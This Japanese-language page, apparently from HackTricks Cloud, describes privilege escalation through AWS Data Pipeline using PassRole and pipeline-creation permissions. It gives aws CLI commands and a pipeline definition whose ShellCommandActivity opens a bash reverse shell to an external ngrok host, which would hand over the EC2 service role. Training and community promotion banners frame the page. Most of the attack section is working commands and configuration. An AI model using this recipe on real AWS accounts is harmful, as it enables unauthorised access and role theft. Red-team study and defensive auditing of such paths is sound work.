AWS - Datapipeline Privesc

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

• サブスクリプションプランを確認してください！
• **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
• HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

datapipeline

datapipeline の詳細については次を参照してください:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

これらの権限を持つユーザーは、Data Pipeline を作成して権限昇格できます。割り当てられたロールの権限を使用して任意のコマンドを実行します：

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

パイプライン作成後、攻撃者はその定義を更新し、特定のアクションやリソースの作成を指定します:

{
"objects": [
{
"id": "CreateDirectory",
"type": "ShellCommandActivity",
"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn": { "ref": "instance" }
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id": "instance",
"name": "instance",
"type": "Ec2Resource",
"actionOnTaskFailure": "terminate",
"actionOnResourceFailure": "retryAll",
"maximumRetries": "1",
"instanceType": "t2.micro",
"securityGroups": ["default"],
"role": "assumable_datapipeline",
"resourceRole": "assumable_ec2_profile_instance"
}
]
}

Note

注意: line 14, 15 and 27 の role は assumable by datapipeline.amazonaws.com である必要があり、line 28 の role assumable by ec2.amazonaws.com with a EC2 profile instance である必要があります。

さらに、EC2 インスタンスはその EC2 インスタンスでassumableな role のみアクセスできるため（つまり奪えるのはそれだけしかありません）。

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

攻撃者が作成したパイプライン定義ファイルは、コマンドを実行する指示を含む、または AWS API を介してリソースを作成する指示を含み、Data Pipeline のロール権限を悪用して追加の権限を取得する可能性があります。

影響の可能性: 指定された ec2 サービスロールへの直接的な privesc。

参考

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Tip

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する：HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

• サブスクリプションプランを確認してください！
• **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
• HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。